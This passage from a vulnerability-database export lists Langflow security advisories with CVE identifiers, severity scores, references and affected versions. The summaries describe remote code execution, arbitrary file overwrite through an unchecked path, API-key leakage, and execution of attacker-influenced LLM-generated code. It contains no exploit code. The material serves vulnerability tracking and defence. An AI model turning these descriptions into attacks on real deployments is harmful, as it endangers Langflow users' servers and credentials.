scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g22f-v6f7-2hrh
7
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-036/
reference_id ZDI-26-036
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-24T04:56:28Z/
url https://www.zerodayinitiative.com/advisories/ZDI-26-036/
fixed_packages
aliases CVE-2026-0770, GHSA-g22f-v6f7-2hrh
risk_score 10.0
exploitability 2.0
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rc54-gw71-gyau
13
url VCID-s17d-sfjq-z7eg
vulnerability_id VCID-s17d-sfjq-z7eg
summary langflow v1.0.12 was discovered to contain a remote code execution (RCE) vulnerability via the PythonCodeTool component.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-42835
reference_id
reference_type
scores
0
value 0.0911
scoring_system epss
scoring_elements 0.92829
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-42835
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/issues/2908
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-31T18:26:22Z/
url https://github.com/langflow-ai/langflow/issues/2908
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-42835
reference_id CVE-2024-42835
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-42835
4
reference_url https://github.com/advisories/GHSA-56m6-4mhw-h3g5
reference_id GHSA-56m6-4mhw-h3g5
reference_type
scores
url https://github.com/advisories/GHSA-56m6-4mhw-h3g5
fixed_packages
0
url pkg:pypi/langflow@1.0.13
purl pkg:pypi/langflow@1.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-9k4q-zwxf-euh1
6
vulnerability VCID-bb6r-1f6u-t7ed
7
vulnerability VCID-fc5h-qc2t-xqc3
8
vulnerability VCID-jt18-vv56-2fgx
9
vulnerability VCID-ncvf-vzqr-uydz
10
vulnerability VCID-q4r1-xjfk-7bg9
11
vulnerability VCID-qwtw-q92t-quhz
12
vulnerability VCID-rc54-gw71-gyau
13
vulnerability VCID-sbea-kkfu-akgb
14
vulnerability VCID-u8mw-7znw-rfab
15
vulnerability VCID-v5pc-pdm9-97g8
16
vulnerability VCID-wv26-29b9-vqgg
17
vulnerability VCID-ypxh-x2hy-3uhb
18
vulnerability VCID-ysnc-jyxb-6qcy
19
vulnerability VCID-zqwj-45w7-7kft
20
vulnerability VCID-ztx2-wefa-c7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.13
aliases CVE-2024-42835, GHSA-56m6-4mhw-h3g5, PYSEC-2024-279
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s17d-sfjq-z7eg
14
url VCID-sbea-kkfu-akgb
vulnerability_id VCID-sbea-kkfu-akgb
summary Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-68478
reference_id
reference_type
scores
0
value 0.00034
scoring_system epss
scoring_elements 0.10573
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-68478
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-19T17:23:19Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-68478
reference_id CVE-2025-68478
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-68478
4
reference_url https://github.com/advisories/GHSA-f43r-cc68-gpx4
reference_id GHSA-f43r-cc68-gpx4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f43r-cc68-gpx4
fixed_packages
0
url pkg:pypi/langflow@1.7.0
purl pkg:pypi/langflow@1.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-bb6r-1f6u-t7ed
5
vulnerability VCID-ncvf-vzqr-uydz
6
vulnerability VCID-q4r1-xjfk-7bg9
7
vulnerability VCID-qwtw-q92t-quhz
8
vulnerability VCID-rc54-gw71-gyau
9
vulnerability VCID-rrva-95s5-kbcf
10
vulnerability VCID-sbea-kkfu-akgb
11
vulnerability VCID-u8mw-7znw-rfab
12
vulnerability VCID-v5pc-pdm9-97g8
13
vulnerability VCID-ypxh-x2hy-3uhb
14
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.0
1
url pkg:pypi/langflow@1.7.1
purl pkg:pypi/langflow@1.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1
aliases CVE-2025-68478, GHSA-f43r-cc68-gpx4, PYSEC-2025-125
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sbea-kkfu-akgb
15
url VCID-u8mw-7znw-rfab
vulnerability_id VCID-u8mw-7znw-rfab
summary 
Langflow has an Information Leak through Incomplete API Key Redaction
A weakness has been identified in langflow-ai langflow up to 1.8.3. Impacted is the function remove_api_keys/has_api_terms of the file src/backend/base/langflow/api/utils/core.py of the component Flow Using API. This manipulation causes unprotected storage of credentials. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-6597
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.0156
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-6597
1
reference_url https://gist.github.com/chenhouser2025/b93261c6e651f14800a4f2e4365f357b
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 2.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
3
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
4
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/
url https://gist.github.com/chenhouser2025/b93261c6e651f14800a4f2e4365f357b
2
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-6597
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-6597
4
reference_url https://vuldb.com/submit/791920
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 2.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
3
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
4
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/
url https://vuldb.com/submit/791920
5
reference_url https://vuldb.com/vuln/358232
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 2.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
3
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
4
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/
url https://vuldb.com/vuln/358232
6
reference_url https://vuldb.com/vuln/358232/cti
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 2.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
3
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
4
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/
url https://vuldb.com/vuln/358232/cti
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
8
reference_url https://github.com/advisories/GHSA-5jjf-wcvf-923w
reference_id GHSA-5jjf-wcvf-923w
reference_type
scores
url https://github.com/advisories/GHSA-5jjf-wcvf-923w
fixed_packages
0
url pkg:pypi/langflow@1.8.4
purl pkg:pypi/langflow@1.8.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2195-gd33-xbdp
1
vulnerability VCID-4swq-hbjm-3ucd
2
vulnerability VCID-q4r1-xjfk-7bg9
3
vulnerability VCID-rrva-95s5-kbcf
4
vulnerability VCID-v5pc-pdm9-97g8
5
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.8.4
aliases CVE-2026-6597, GHSA-5jjf-wcvf-923w
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u8mw-7znw-rfab
16
url VCID-v5pc-pdm9-97g8
vulnerability_id VCID-v5pc-pdm9-97g8
summary Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assistant feature in Langflow executes LLM-generated Python code during its validation phase. Although this phase appears intended to validate generated component code, the implementation reaches dynamic execution sinks and instantiates the generated class server-side. In deployments where an attacker can access the Agentic Assistant feature and influence the model output, this can result in arbitrary server-side Python execution. Version 1.9.0 fixes the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33873
reference_id
reference_type
scores
0
value 0.00065
scoring_system epss
scoring_elements 0.20469
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33873
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/router.py#L252-L297
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/router.py#L252-L297
3
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/schemas.py#L20-L31
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/schemas.py#L20-L31
4
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/code_extraction.py#L11-L53
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/code_extraction.py#L11-L53
5
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/validation.py#L27-L47
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/validation.py#L27-L47
6
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L142-L156
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L142-L156
7
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L259-L300
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L259-L300
8
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L58-L79
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L58-L79
9
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/utils/core.py#L38
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/utils/core.py#L38
10
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/v1/login.py#L96-L135
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/v1/login.py#L96-L135
11
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L156-L163
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L156-L163
12
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L39-L53
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L39-L53
13
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L241-L272
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L241-L272
14
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L394-L399
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L394-L399
15
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/lfx/src/lfx/custom/validate.py#L441-L443
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
